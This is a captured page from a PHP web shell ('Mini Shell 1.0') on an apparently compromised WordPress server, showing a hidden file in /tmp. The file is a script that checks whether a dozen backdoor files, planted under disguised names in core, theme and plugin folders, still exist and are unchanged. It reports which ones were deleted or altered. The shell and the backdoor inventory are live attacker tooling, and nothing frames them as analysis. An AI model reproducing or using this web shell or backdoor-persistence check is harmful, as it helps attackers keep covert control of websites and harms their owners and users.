HOME


Mini Shell 1.0
DIR: /tmp/
Upload File :
Current File : //tmp/.created
<?php   $r = '/var/www/2of3'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@32441@@$_COOKIE[-",
"/wp-content/plugins/ocean-extra/includes/freemius/includes/sdk/Exceptions/html4strict.php"=>"bd@@34058@@1613",
"/wp-content/themes/front_page_template_1747153510/singIe.php"=>"bd@@30774@@1049",
"/wp-content/plugins/duplicator/vendor/requests/library/Requests/Exception/HTTP/temp6.php"=>"bd@@33876@@535",
"/wp-includes/widgets/class-wp-widget-links.php"=>"bd@@32864@@84",
"/wp-content/themes/theme/patterns/banner-about-book.php"=>"bd@@33404@@config_manager",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Node/Expression/view_message.php"=>"bd@@33921@@1539",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/invoker/src/library.php"=>"bd@@33956@@1033",
"/wp-content/plugins/duplicator/vendor/requests/library/Requests/Utility/usercp_avatar.php"=>"bd@@33989@@1065",
"/wp-includes/feed-atom-comments.php"=>"bd@@32971@@34",
"/wp-content/plugins/93hok24o/freemius/templates/debug/logger.php"=>"bd@@33522@@100",
"/wp-content/plugins/93hok24o/freemius/includes/supplements/fs-essential-functions-2.2.1.php"=>"bd@@33278@@Large-Allocation"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');